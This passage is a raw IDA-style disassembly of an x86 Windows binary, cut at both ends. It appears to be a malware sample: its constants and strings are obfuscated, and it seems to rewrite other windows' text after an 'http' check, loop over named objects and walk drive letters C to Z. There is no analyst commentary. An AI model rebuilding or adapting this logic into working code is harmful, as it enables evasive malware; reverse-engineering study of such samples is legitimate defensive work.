cmp eax, edx
jz short loc_418F02
movsx edx, word ptr ds:10013130h
add edx, 7
cmp eax, edx
jnz short loc_418F1E
loc_418F02: ; CODE XREF: sub_418999+559�j
mov eax, [ebp+var_40E9C]
mov edx, ds:1001325Ch
add edx, ds:100131D8h
sub edx, 11h
mov [ebp+eax+var_60E9F], dl
loc_418F1E: ; CODE XREF: sub_418999+567�j
inc [ebp+var_40E9C]
loc_418F24: ; CODE XREF: sub_418999+53D�j
mov eax, [ebp+var_60EB8]
cmp [ebp+var_40E9C], eax
jb short loc_418ED8
lea eax, [ebp+var_60E9F]
push eax
lea eax, [ebp+var_50E9B]
push eax
call sub_423399
mov eax, ds:10013148h
sub eax, 2
mov [ebp+var_40E9C], eax
loc_418F53: ; CODE XREF: sub_418999+70D�j
mov eax, [ebp+var_40E9C]
lea ecx, [ebp+eax+var_60E9F]
or eax, 0FFFFFFFFh
loc_418F63: ; CODE XREF: sub_418999+5CF�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_418F63
mov [ebp+var_60EA8], eax
mov edx, ds:10013184h
add edx, ds:10013188h
sub edx, 2
cmp eax, edx
jz short loc_418F9B
movsx edx, word ptr ds:10013130h
mov ecx, ds:1001313Ch
lea edx, [edx+ecx+0C2h]
cmp eax, edx
jbe short loc_418FA0
loc_418F9B: ; CODE XREF: sub_418999+5E8�j
jmp loc_419079
; ---------------------------------------------------------------------------
loc_418FA0: ; CODE XREF: sub_418999+600�j
mov eax, ds:100131B0h
sub eax, 7
mov [ebp+var_60EA4], eax
jmp short loc_418FE0
; ---------------------------------------------------------------------------
loc_418FB0: ; CODE XREF: sub_418999+653�j
mov eax, [ebp+var_40E9C]
add eax, [ebp+var_60EA4]
movsx eax, [ebp+eax+var_60E9F]
mov edx, ds:1001313Ch
add edx, 17h
movsx ecx, word ptr ds:10013144h
add edx, ecx
cmp eax, edx
jnz short loc_418FEE
inc [ebp+var_60EA4]
loc_418FE0: ; CODE XREF: sub_418999+615�j
mov eax, [ebp+var_60EA8]
cmp [ebp+var_60EA4], eax
jb short loc_418FB0
loc_418FEE: ; CODE XREF: sub_418999+63F�j
mov eax, [ebp+var_60EA8]
cmp [ebp+var_60EA4], eax
jz short loc_419079
mov eax, ds:100131A8h
movsx edx, word ptr ds:10013218h
add eax, edx
sub eax, 6
push eax
mov eax, [ebp+var_40E9C]
lea eax, [ebp+eax+var_60E9F]
push eax
lea eax, [ebp+var_50E9B]
push eax
call sub_4188C2
add esp, 0Ch
mov [ebp+var_60EDC], eax
mov eax, ds:10013154h
add eax, 0FFF8h
cmp [ebp+var_60EDC], eax
jnz short loc_419079
push 1001495Fh
call sub_41C914
push eax
lea edi, [ebp+var_50E9B]
push edi
call dword ptr ds:1000D020h
mov eax, [ebp+var_40E9C]
lea eax, [ebp+eax+var_60E9F]
push eax
lea eax, [ebp+var_50E9B]
push eax
call dword ptr ds:1000D020h
add esp, 14h
loc_419079: ; CODE XREF: sub_418999:loc_418F9B�j
; sub_418999+661�j ...
mov eax, [ebp+var_60EA8]
movsx edx, word ptr ds:100131E0h
movsx ecx, word ptr ds:100131C0h
add edx, ecx
sub edx, 6
add eax, edx
add [ebp+var_40E9C], eax
mov eax, [ebp+var_60EB8]
cmp [ebp+var_40E9C], eax
jb loc_418F53
mov eax, ds:1001328Ch
sub eax, 6
mov [ebp+var_60EB4], eax
lea ecx, [ebp+var_50E9B]
or eax, 0FFFFFFFFh
loc_4190C3: ; CODE XREF: sub_418999+72F�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_4190C3
mov [ebp+var_60EA8], eax
mov eax, ds:100130ACh
add eax, ds:100130F4h
sub eax, 8
mov [ebp+var_40E9C], eax
jmp loc_419327
; ---------------------------------------------------------------------------
loc_4190E9: ; CODE XREF: sub_418999+99A�j
mov eax, [ebp+var_40E9C]
movzx eax, [ebp+eax+var_50E9B]
mov edx, ds:10013254h
add edx, 17h
add edx, ds:10013168h
cmp eax, edx
jz short loc_419111
and [ebp+var_60EAC], 0
loc_419111: ; CODE XREF: sub_418999+76F�j
mov eax, [ebp+var_40E9C]
movzx eax, [ebp+eax+var_50E9B]
mov edx, ds:100131C4h
add edx, 13h
movsx ecx, word ptr ds:10013150h
add edx, ecx
cmp eax, edx
jnz loc_4192D3
movsx eax, word ptr ds:10013230h
movsx edx, word ptr ds:10013124h
add eax, edx
sub eax, 0Ch
cmp [ebp+var_40E9C], eax
jbe loc_419209
mov eax, [ebp+var_40E9C]
mov edx, ds:100131B8h
add edx, ds:1001325Ch
sub edx, 0Ch
sub eax, edx
mov al, [ebp+eax+var_50E9B]
mov [ebp+var_60EDD], al
movzx eax, [ebp+var_60EDD]
mov edx, ds:100131A0h
add edx, 1Dh
cmp eax, edx
jle short loc_4191A5
movsx edx, word ptr ds:10013240h
mov ecx, ds:10013224h
lea edx, [edx+ecx+29h]
cmp eax, edx
jl short loc_4191FF
loc_4191A5: ; CODE XREF: sub_418999+7F5�j
movzx eax, [ebp+var_60EDD]
mov edx, ds:10013164h
add edx, 35h
add edx, ds:10013168h
cmp eax, edx
jle short loc_4191CD
movsx edx, word ptr ds:10013260h
add edx, 3Fh
cmp eax, edx
jl short loc_4191FF
loc_4191CD: ; CODE XREF: sub_418999+824�j
movzx eax, [ebp+var_60EDD]
movsx edx, word ptr ds:100131A4h
mov ecx, ds:100131E4h
lea edx, [edx+ecx+6Fh]
cmp eax, edx
jle short loc_419209
mov edx, ds:10013138h
add edx, 76h
movsx ecx, word ptr ds:1001324Ch
add edx, ecx
cmp eax, edx
jge short loc_419209
loc_4191FF: ; CODE XREF: sub_418999+80A�j
; sub_418999+832�j
mov [ebp+var_60EAC], 1
loc_419209: ; CODE XREF: sub_418999+7B9�j
; sub_418999+84E�j ...
mov eax, [ebp+var_60EA8]
cmp [ebp+var_40E9C], eax
jnb loc_4192D3
mov eax, [ebp+var_40E9C]
movsx edx, word ptr ds:10013240h
add edx, ds:10013200h
sub edx, 6
add eax, edx
mov al, [ebp+eax+var_50E9B]
mov [ebp+var_60EDD], al
movzx eax, [ebp+var_60EDD]
mov edx, ds:1001321Ch
add edx, 0Fh
add edx, ds:10013128h
cmp eax, edx
jle short loc_41926D
mov edx, ds:100130D4h
add edx, 26h
add edx, ds:10013270h
cmp eax, edx
jl short loc_4192C9
loc_41926D: ; CODE XREF: sub_418999+8BF�j
movzx eax, [ebp+var_60EDD]
mov edx, ds:1001317Ch
add edx, 31h
movsx ecx, word ptr ds:10013100h
add edx, ecx
cmp eax, edx
jle short loc_41929F
movsx edx, word ptr ds:10013174h
mov ecx, ds:100131A8h
lea edx, [edx+ecx+38h]
cmp eax, edx
jl short loc_4192C9
loc_41929F: ; CODE XREF: sub_418999+8EF�j
movzx eax, [ebp+var_60EDD]
mov edx, ds:100130A0h
add edx, 74h
movsx ecx, word ptr ds:10013098h
add edx, ecx
cmp eax, edx
jle short loc_4192D3
mov edx, ds:10013200h
add edx, 7Ah
cmp eax, edx
jge short loc_4192D3
loc_4192C9: ; CODE XREF: sub_418999+8D2�j
; sub_418999+904�j
mov [ebp+var_60EAC], 1
loc_4192D3: ; CODE XREF: sub_418999+79A�j
; sub_418999+87C�j ...
cmp [ebp+var_60EAC], 0
jnz short loc_4192FC
mov eax, [ebp+var_60EB4]
mov edx, [ebp+var_40E9C]
mov dl, [ebp+edx+var_50E9B]
mov [ebp+eax+var_50E9B], dl
inc [ebp+var_60EB4]
loc_4192FC: ; CODE XREF: sub_418999+941�j
mov eax, [ebp+var_40E9C]
movzx eax, [ebp+eax+var_50E9B]
mov edx, ds:100131CCh
add edx, 1Ah
cmp eax, edx
jnz short loc_419321
mov [ebp+var_60EAC], 1
loc_419321: ; CODE XREF: sub_418999+97C�j
inc [ebp+var_40E9C]
loc_419327: ; CODE XREF: sub_418999+74B�j
mov eax, [ebp+var_60EA8]
cmp [ebp+var_40E9C], eax
jb loc_4190E9
mov eax, [ebp+var_60EB4]
mov edx, ds:100130F4h
add edx, ds:10013138h
sub edx, 7
mov [ebp+eax+var_50E9B], dl
loc_419355: ; CODE XREF: sub_418999+4FD�j
mov eax, [ebp+var_60ED4]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_419361: ; CODE XREF: sub_418999+4D9�j
and [ebp+var_60EB0], 0
lea eax, [ebp+var_60EB0]
push eax
push 10014A88h
mov eax, [ebp+var_60EC0]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
mov eax, ds:10013158h
sub eax, 9
cmp ebx, eax
jnz loc_419675
lea eax, [ebp+var_60EBC]
push eax
mov eax, [ebp+var_60EB0]
push eax
mov edi, [eax]
call dword ptr [edi+6Ch]
mov ebx, eax
movsx eax, word ptr ds:10013174h
movsx edx, word ptr ds:10013264h
add eax, edx
sub eax, 10h
cmp ebx, eax
jnz loc_419669
mov eax, ds:100130ACh
dec eax
mov [ebp-50EA0h], eax
jmp loc_419657
; ---------------------------------------------------------------------------
loc_4193D7: ; CODE XREF: sub_418999+CCA�j
mov eax, ds:100131ACh
sub eax, 5
push eax
call dword ptr ds:10012630h
pop ecx
mov [ebp+var_70F08], 2
mov eax, [ebp-50EA0h]
mov [ebp+var_70F00], eax
lea eax, [ebp+var_70EF8]
push eax
lea esi, [ebp+var_70F08]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
lea esi, [ebp+var_70F08]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, [ebp+var_60EB0]
push edi
mov edi, [edi]
call dword ptr [edi+74h]
mov ebx, eax
mov eax, ds:100131E8h
movsx edx, word ptr ds:10013150h
add eax, edx
sub eax, 9
cmp ebx, eax
jnz loc_419651
and [ebp+var_70EF4], 0
lea eax, [ebp+var_70EF4]
push eax
push 10014A78h
mov eax, [ebp+var_70EF8]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
mov eax, ds:10013128h
sub eax, 9
cmp ebx, eax
jnz loc_419645
lea eax, [ebp+var_60EF0]
push eax
mov eax, ds:10013168h
add eax, ds:10013280h
sub eax, 4
push eax
push [ebp+var_30E44]
mov eax, [ebp+var_70EF4]
push eax
mov edi, [eax]
call dword ptr [edi+20h]
mov ebx, eax
or ebx, ebx
jnz short loc_4194BB
cmp [ebp+var_60EF0], 8
jz short loc_4194C0
loc_4194BB: ; CODE XREF: sub_418999+B16�j
jmp loc_419639
; ---------------------------------------------------------------------------
loc_4194C0: ; CODE XREF: sub_418999+B20�j
movsx eax, word ptr ds:1001322Ch
add eax, ds:10013140h
movsx edx, word ptr ds:10013180h
sub edx, 4
mov byte ptr [ebp+eax+var_70F00+1], dl
lea eax, [ebp+var_70EEF]
push eax
push [ebp+var_60EE8]
call sub_41C841
add esp, 8
mov edi, eax
inc edi
mov [ebp+var_71F0C], edi
push [ebp+var_60EE8]
call dword ptr ds:10012BA0h
mov eax, ds:100131E8h
movsx edx, word ptr ds:100130BCh
add eax, edx
movsx eax, [ebp+eax+var_70EF9]
mov edx, ds:100131F4h
add edx, ds:100131F8h
sub edx, 7
cmp eax, edx
jz loc_419639
push [ebp+var_30E4C]
lea eax, [ebp+var_70EEF]
push eax
call sub_41DF98
add esp, 8
lea eax, [ebp+var_60EF0]
push eax
mov eax, ds:10013254h
movsx edx, word ptr ds:100131DCh
add eax, edx
sub eax, 0Ah
push eax
push [ebp+var_30E48]
mov eax, [ebp+var_70EF4]
push eax
mov edi, [eax]
call dword ptr [edi+20h]
mov ebx, eax
mov eax, ds:10013158h
mov edx, ds:10013198h
sub edx, 2
mov byte ptr [ebp+eax+var_71F10], dl
or ebx, ebx
jnz short loc_4195C4
cmp [ebp+var_60EF0], 8
jnz short loc_4195C4
lea eax, [ebp+var_71F07]
push eax
push [ebp+var_60EE8]
call sub_41C841
add esp, 8
mov edi, eax
inc edi
mov [ebp+var_71F10], edi
push [ebp+var_60EE8]
call dword ptr ds:10012BA0h
loc_4195C4: ; CODE XREF: sub_418999+BF5�j
; sub_418999+BFF�j
push 10014957h
call sub_41C914
push dword ptr [ebp-50EA0h]
push eax
lea edi, [ebp+var_30E3F]
push edi
call dword ptr ds:10012634h
lea eax, [ebp+var_30E3F]
push eax
lea eax, [ebp+var_30D40]
push eax
call dword ptr ds:1000D020h
lea eax, [ebp+var_71F07]
push eax
lea eax, [ebp+var_30D40]
push eax
call dword ptr ds:1000D020h
push 10014952h
call sub_41C914
push eax
lea edi, [ebp+var_30D40]
push edi
call dword ptr ds:1000D020h
lea eax, [ebp+var_70EEF]
push eax
lea eax, [ebp+var_30D40]
push eax
call dword ptr ds:1000D020h
add esp, 34h
loc_419639: ; CODE XREF: sub_418999:loc_4194BB�j
; sub_418999+B96�j
mov eax, [ebp+var_70EF4]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_419645: ; CODE XREF: sub_418999+AE4�j
mov eax, [ebp+var_70EF8]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_419651: ; CODE XREF: sub_418999+AAF�j
inc dword ptr [ebp-50EA0h]
loc_419657: ; CODE XREF: sub_418999+A39�j
mov eax, [ebp+var_60EBC]
cmp [ebp-50EA0h], eax
jb loc_4193D7
loc_419669: ; CODE XREF: sub_418999+A27�j
mov eax, [ebp+var_60EB0]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_419675: ; CODE XREF: sub_418999+9F7�j
mov eax, [ebp+var_60EC0]
push eax
mov esi, [eax]
call dword ptr [esi+8]
movzx eax, [ebp+var_50E9B]
mov edx, ds:100131ECh
sub edx, 8
cmp eax, edx
jz short loc_4196DC
push 1001494Ch
call sub_41C914
push eax
lea edi, [ebp+var_30D40]
push edi
call dword ptr ds:1000D020h
lea eax, [ebp+var_50E9B]
push eax
lea eax, [ebp+var_30D40]
push eax
call dword ptr ds:1000D020h
push 10014947h
call sub_41C914
push eax
lea edi, [ebp+var_30D40]
push edi
call dword ptr ds:1000D020h
add esp, 20h
loc_4196DC: ; CODE XREF: sub_418999+46F�j
; sub_418999+CFA�j
inc [ebp+var_30E50]
loc_4196E2: ; CODE XREF: sub_418999+3F9�j
mov eax, [ebp+var_30E58]
cmp [ebp+var_30E50], eax
jb loc_418D97
loc_4196F4: ; CODE XREF: sub_418999+28D�j
; sub_418999+30D�j ...
inc [ebp+var_40E5C]
mov eax, [ebp+var_40E90]
cmp [ebp+var_40E5C], eax
jl loc_418BE1
lea eax, [ebp+var_30D40]
push eax
call dword ptr ds:1001262Ch
pop ecx
push [ebp+var_30E44]
call dword ptr ds:10012BA0h
push [ebp+var_30E48]
call dword ptr ds:10012BA0h
loc_419732: ; CODE XREF: sub_418999+1EE�j
mov eax, [ebp+var_40E70]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_41973E: ; CODE XREF: sub_418999+1C7�j
mov eax, [ebp+var_40E6C]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_41974A: ; CODE XREF: sub_418999+1A4�j
mov eax, [ebp+var_40E68]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_419756: ; CODE XREF: sub_418999+C7�j
; sub_418999:loc_418AB4�j ...
mov eax, [ebp+var_40E64]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_419762: ; CODE XREF: sub_418999+61�j
; sub_418999+A2�j
pop edi
pop esi
pop ebx
leave
retn
sub_418999 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419767 proc near ; CODE XREF: sub_41AFF0+94�p
; sub_41AFF0+CE�p ...
var_4 = dword ptr -4
arg_0 = byte ptr 8
push ebp
mov ebp, esp
push ecx
push ebx
push edi
movzx eax, [ebp+arg_0]
mov ecx, 0Ah
mov edx, 0CCCCCCCDh
mul edx
shr edx, 3
mov [ebp+var_4], edx
mov edi, edx
add edi, 61h
mov ebx, edi
mov [ebp+arg_0], bl
mov al, [ebp+arg_0]
cmp al, 65h
jz short loc_4197A8
cmp al, 79h
jz short loc_4197A8
cmp al, 75h
jz short loc_4197A8
cmp al, 69h
jz short loc_4197A8
cmp al, 6Fh
jz short loc_4197A8
cmp al, 61h
jnz short loc_4197AC
loc_4197A8: ; CODE XREF: sub_419767+2B�j
; sub_419767+2F�j ...
add [ebp+arg_0], 1
loc_4197AC: ; CODE XREF: sub_419767+3F�j
cmp [ebp+arg_0], 6Ah
jnz short loc_4197B6
add [ebp+arg_0], 1
loc_4197B6: ; CODE XREF: sub_419767+49�j
movzx eax, [ebp+arg_0]
pop edi
pop ebx
leave
retn
sub_419767 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4197BE proc near ; CODE XREF: .data:0041BD80�p
var_100C = byte ptr -100Ch
var_1004 = byte ptr -1004h
var_1003 = byte ptr -1003h
var_FFF = byte ptr -0FFFh
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1000h
call sub_423379
push ebx
push esi
push edi
push 10014935h
call sub_41C914
pop ecx
push 0
push eax
push 0
push [ebp+arg_0]
call dword ptr ds:1001263Ch
mov edi, eax
or edi, edi
jnz short loc_4197F0
mov edi, [ebp+arg_0]
loc_4197F0: ; CODE XREF: sub_4197BE+2D�j
push 1001491Fh
call sub_41C914
pop ecx
push 0
push eax
push 0
push edi
call dword ptr ds:1001263Ch
mov edi, eax
lea eax, [ebp+var_FFF]
push eax
push 0FFFh
push 0Dh
push edi
call dword ptr ds:1000D014h
movsx eax, word ptr ds:100131B4h
add eax, ds:10013188h
cmp [ebp+eax+var_1003], 20h
jnz short loc_41984E
mov eax, ds:10013194h
add eax, ds:100131C4h
cmp [ebp+eax+var_100C], 20h
jz loc_4198E5
loc_41984E: ; CODE XREF: sub_4197BE+75�j
mov eax, ds:100130C8h
cmp [ebp+eax+var_FFF], 68h
jnz short loc_419874
movsx eax, word ptr ds:10013230h
add eax, ds:10013188h
cmp [ebp+eax+var_1004], 74h
jz short loc_4198E5
loc_419874: ; CODE XREF: sub_4197BE+9D�j
lea ecx, [ebp+var_FFF]
or eax, 0FFFFFFFFh
loc_41987D: ; CODE XREF: sub_4197BE+C4�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_41987D
mov ebx, ds:10013274h
add ebx, 0Ch
cmp eax, ebx
jb short loc_4198E5
push 1001491Ah
call sub_41C914
mov esi, ds:10013128h
sub esi, 5
push esi
push eax
lea esi, [ebp+var_FFF]
push esi
call sub_4188C2
add esp, 10h
movsx ebx, word ptr ds:100131A4h
add ebx, 0FFF8h
cmp eax, ebx
jnz short loc_4198E5
push 10014914h
call sub_41C914
pop ecx
push eax
mov esi, ds:10013214h
sub esi, 9
push esi
push 0Ch
push edi
call dword ptr ds:1000D014h
loc_4198E5: ; CODE XREF: sub_4197BE+8A�j
; sub_4197BE+B4�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_4197BE endp
; =============== S U B R O U T I N E =======================================
sub_4198EA proc near ; CODE XREF: .data:0041F032�p
push edi
push 10014904h
call sub_41C914
pop ecx
push eax
call dword ptr ds:1000F5E8h
mov ds:100132A8h, eax
test eax, eax
jnz short loc_41991D
push 100148F4h
call sub_41C914
pop ecx
push eax
call dword ptr ds:10010244h
mov ds:100132A8h, eax
loc_41991D: ; CODE XREF: sub_4198EA+1A�j
push 100148E2h
call sub_41C914
push eax
push dword ptr ds:100132A8h
call dword ptr ds:1000F1F8h
mov ds:1000D044h, eax
push 100148D1h
call sub_41C914
push eax
push dword ptr ds:100132A8h
call dword ptr ds:1000F1F8h
mov ds:10012BA0h, eax
push 100148C1h
call sub_41C914
push eax
push dword ptr ds:100132A8h
call dword ptr ds:1000F1F8h
mov ds:10012BB0h, eax
push 100148B2h
call sub_41C914
push eax
push dword ptr ds:100132A8h
call dword ptr ds:1000F1F8h
mov ds:1000D038h, eax
push 100148A2h
call sub_41C914
add esp, 14h
push eax
push dword ptr ds:100132A8h
call dword ptr ds:1000F1F8h
mov ds:10010254h, eax
pop edi
retn
sub_4198EA endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push 10012BA8h
call dword ptr ds:1000FA3Ch
mov eax, ds:10012BA8h
pop ebp
retn 4
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov esi, [ebp+0Ch]
mov edi, [ebp+10h]
push 10014AC8h
push esi
call dword ptr ds:10012648h
or eax, eax
jz short loc_4199F1
mov eax, [ebp+8]
mov [edi], eax
push dword ptr [edi]
mov ebx, [eax]
call dword ptr [ebx+4]
xor eax, eax
jmp short loc_419A39
; ---------------------------------------------------------------------------
loc_4199F1: ; CODE XREF: .data:004199DF�j
push 10014A48h
push esi
call dword ptr ds:10012648h
or eax, eax
jz short loc_419A11
mov eax, [ebp+8]
mov [edi], eax
push dword ptr [edi]
mov ebx, [eax]
call dword ptr [ebx+4]
xor eax, eax
jmp short loc_419A39
; ---------------------------------------------------------------------------
loc_419A11: ; CODE XREF: .data:004199FF�j
push 10014A18h
push esi
call dword ptr ds:10012648h
or eax, eax
jz short loc_419A31
mov eax, [ebp+8]
mov [edi], eax
push dword ptr [edi]
mov ebx, [eax]
call dword ptr [ebx+4]
xor eax, eax
jmp short loc_419A39
; ---------------------------------------------------------------------------
loc_419A31: ; CODE XREF: .data:00419A1F�j
and dword ptr [edi], 0
mov eax, 80004002h
loc_419A39: ; CODE XREF: .data:004199EF�j
; .data:00419A0F�j ...
pop edi
pop esi
pop ebx
pop ebp
retn 0Ch
; ---------------------------------------------------------------------------
dd 4001B8h, 18C280h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
push edi
mov edi, [ebp+8]
push 10004490h
push dword ptr fs:0
mov fs:0, esp
push 1001489Ah
call sub_41C914
push dword ptr [edi]
push eax
lea esi, [ebp-0Ah]
push esi
call dword ptr ds:10012634h
add esp, 10h
loc_419A7E: ; CODE XREF: .data:00419AA3�j
push 0
push dword ptr [edi]
lea eax, [ebp-0Ah]
push eax
call sub_41D764
mov eax, ds:1001323Ch
add eax, ds:10013108h
sub eax, 0Bh
push eax
call dword ptr ds:10012630h
add esp, 10h
jmp short loc_419A7E
; ---------------------------------------------------------------------------
db 5Fh, 5Eh, 0C9h
db 0C2h, 4, 0
; =============== S U B R O U T I N E =======================================
sub_419AAB proc near ; CODE XREF: .data:0041F03C�p
push edi
push 1001488Ch
call sub_41C914
pop ecx
push eax
call dword ptr ds:1000F5E8h
mov ds:100132B0h, eax
test eax, eax
jnz short loc_419ADE
push 1001487Eh
call sub_41C914
pop ecx
push eax
call dword ptr ds:10010244h
mov ds:100132B0h, eax
loc_419ADE: ; CODE XREF: sub_419AAB+1A�j
cmp dword ptr ds:100132B0h, 0
jz short loc_419B01
mov eax, ds:10013248h
add eax, 5
push eax
push dword ptr ds:100132B0h
call dword ptr ds:1000F1F8h
mov ds:1000D01Ch, eax
loc_419B01: ; CODE XREF: sub_419AAB+3A�j
pop edi
retn
sub_419AAB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419B03 proc near ; CODE XREF: .data:loc_41F052�p
; .data:00420EAC�p
var_108 = dword ptr -108h
var_104 = dword ptr -104h
var_FF = byte ptr -0FFh
push ebp
mov ebp, esp
sub esp, 108h
push esi
push edi
movsx eax, word ptr ds:10013150h
mov edi, eax
add edi, ds:100130B8h
sub edi, 9
jmp short loc_419B91
; ---------------------------------------------------------------------------
loc_419B22: ; CODE XREF: sub_419B03+A1�j
push 10014872h
call sub_41C914
mov [ebp+var_108], eax
push 10014868h
call sub_41C914
push edi
push eax
mov esi, [ebp+var_108]
push esi
lea esi, [ebp+var_FF]
push esi
call dword ptr ds:10012634h
add esp, 18h
lea eax, [ebp+var_FF]
push eax
push 0
push 1F0001h
call dword ptr ds:10011648h
mov [ebp+var_104], eax
or eax, eax
jz short loc_419B90
push eax
call dword ptr ds:10011654h
mov eax, ds:100130B8h
dec eax
cmp edi, eax
jnz short loc_419B89
xor eax, eax
inc eax
jmp short loc_419BAC
; ---------------------------------------------------------------------------
loc_419B89: ; CODE XREF: sub_419B03+7F�j
mov eax, 2
jmp short loc_419BAC
; ---------------------------------------------------------------------------
loc_419B90: ; CODE XREF: sub_419B03+6E�j
inc edi
loc_419B91: ; CODE XREF: sub_419B03+1D�j
mov eax, ds:10013234h
add eax, 5Ch
movsx edx, word ptr ds:10013178h
add eax, edx
cmp edi, eax
jb loc_419B22
xor eax, eax
loc_419BAC: ; CODE XREF: sub_419B03+84�j
; sub_419B03+8B�j
pop edi
pop esi
leave
retn
sub_419B03 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419BB0 proc near ; CODE XREF: .data:0041F04B�p
var_104 = dword ptr -104h
var_FF = byte ptr -0FFh
push ebp
mov ebp, esp
sub esp, 104h
push esi
push edi
mov [ebp+var_104], 0FFh
lea eax, [ebp+var_104]
push eax
lea eax, [ebp+var_FF]
push eax
call dword ptr ds:1000F5F0h
push 1001485Eh
call sub_41C914
mov edi, ds:10013138h
add edi, ds:100130DCh
sub edi, 2
push edi
push eax
lea edi, [ebp+var_FF]
push edi
call sub_4188C2
add esp, 10h
movsx esi, word ptr ds:100131F0h
add esi, 0FFFCh
cmp eax, esi
jz short loc_419C19
xor eax, eax
inc eax
jmp short loc_419C60
; ---------------------------------------------------------------------------
loc_419C19: ; CODE XREF: sub_419BB0+62�j
push 10014852h
call sub_41C914
mov edi, ds:100131D0h
add edi, ds:100130A0h
sub edi, 0Ah
push edi
push eax
lea edi, [ebp+var_FF]
push edi
call sub_4188C2
add esp, 10h
mov esi, ds:10013258h
add esi, 0FFF9h
add esi, ds:10013270h
cmp eax, esi
jz short loc_419C5E
xor eax, eax
inc eax
jmp short loc_419C60
; ---------------------------------------------------------------------------
loc_419C5E: ; CODE XREF: sub_419BB0+A7�j
xor eax, eax
loc_419C60: ; CODE XREF: sub_419BB0+67�j
; sub_419BB0+AC�j
pop edi
pop esi
leave
retn
sub_419BB0 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 2Ch
push ebx
push esi
push edi
mov eax, [ebp+18h]
mov [ebp+18h], ax
movsx eax, word ptr ds:1001327Ch
add eax, 0C4h
cmp [ebp+0Ch], eax
jnz loc_419D93
mov word ptr [ebp-18h], 3
lea eax, [ebp-10h]
push eax
mov eax, ds:10013394h
push eax
mov edi, [eax]
call dword ptr [edi+1Ch]
mov [ebp-4], eax
movsx eax, word ptr ds:1001327Ch
add eax, ds:100130B4h
sub eax, 0Ch
cmp [ebp-4], eax
jnz loc_419D8F
dec dword ptr [ebp-10h]
lea eax, [ebp-1Ch]
push eax
lea esi, [ebp-18h]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, ds:10013394h
push edi
mov edi, [edi]
call dword ptr [edi+20h]
mov [ebp-4], eax
mov eax, ds:1001326Ch
sub eax, 9
cmp [ebp-4], eax
jnz loc_419D8F
lea eax, [ebp-20h]
push eax
push 10014AD8h
mov eax, [ebp-1Ch]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov [ebp-4], eax
mov eax, ds:10013254h
add eax, ds:10013224h
sub eax, 0Eh
cmp [ebp-4], eax
jnz short loc_419D86
lea eax, ds:10013390h
mov [ebp-8], eax
push eax
mov ebx, [eax]
call dword ptr [ebx+4]
lea eax, [ebp-24h]
push eax
push 10014A18h
mov eax, [ebp-8]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov [ebp-4], eax
mov eax, ds:100130A0h
sub eax, 4
cmp [ebp-4], eax
jnz short loc_419D74
lea eax, [ebp-2Ch]
push eax
push 10014A18h
push dword ptr [ebp-24h]
push dword ptr [ebp-20h]
call sub_41FA4A
add esp, 10h
mov [ebp-28h], eax
mov eax, [ebp-24h]
push eax
mov ebx, [eax]
call dword ptr [ebx+8]
loc_419D74: ; CODE XREF: .data:00419D4F�j
mov eax, [ebp-8]
push eax
mov ebx, [eax]
call dword ptr [ebx+8]
mov eax, [ebp-20h]
push eax
mov ebx, [eax]
call dword ptr [ebx+8]
loc_419D86: ; CODE XREF: .data:00419D1A�j
mov eax, [ebp-1Ch]
push eax
mov ebx, [eax]
call dword ptr [ebx+8]
loc_419D8F: ; CODE XREF: .data:00419CB4�j
; .data:00419CEA�j
xor eax, eax
jmp short loc_419D98
; ---------------------------------------------------------------------------
loc_419D93: ; CODE XREF: .data:00419C83�j
mov eax, 80020003h
loc_419D98: ; CODE XREF: .data:00419D91�j
pop edi
pop esi
pop ebx
leave
retn 24h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
loc_419DA2: ; CODE XREF: .data:00419DD2�j
movsx eax, word ptr ds:1001327Ch
sub eax, 4
push eax
call dword ptr ds:10012630h
pop ecx
movsx eax, word ptr ds:10013218h
add eax, ds:100131ACh
sub eax, 0Ah
push eax
push 10004912h
push 0
call dword ptr ds:1000D048h
jmp short loc_419DA2
; ---------------------------------------------------------------------------
dd 4C25Dh
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 28h
push ebx
push esi
push edi
mov esi, 43h
jmp short loc_419DF1
; ---------------------------------------------------------------------------
loc_419DE8: ; CODE XREF: .data:00419DF4�j
and dword ptr ds:10012790h[esi*4], 0
inc esi
loc_419DF1: ; CODE XREF: .data:00419DE6�j
cmp esi, 5Ah
jbe short loc_419DE8
loc_419DF6: ; CODE XREF: .data:00419F6A�j
mov edi, 43h
jmp loc_419F51
; ---------------------------------------------------------------------------
loc_419E00: ; CODE XREF: .data:00419F54�j
mov eax, ds:100131E8h
dec eax
push eax
call dword ptr ds:10012630h
push 1001484Ah
call sub_41C914
push edi
push eax
lea ebx, [ebp-0Eh]
push ebx
call dword ptr ds:10012634h
add esp, 14h
cmp dword ptr ds:10012790h[edi*4], 0
jz short loc_419E6A
mov eax, ds:1001320Ch
sub eax, 6
mov [ebp-14h], eax
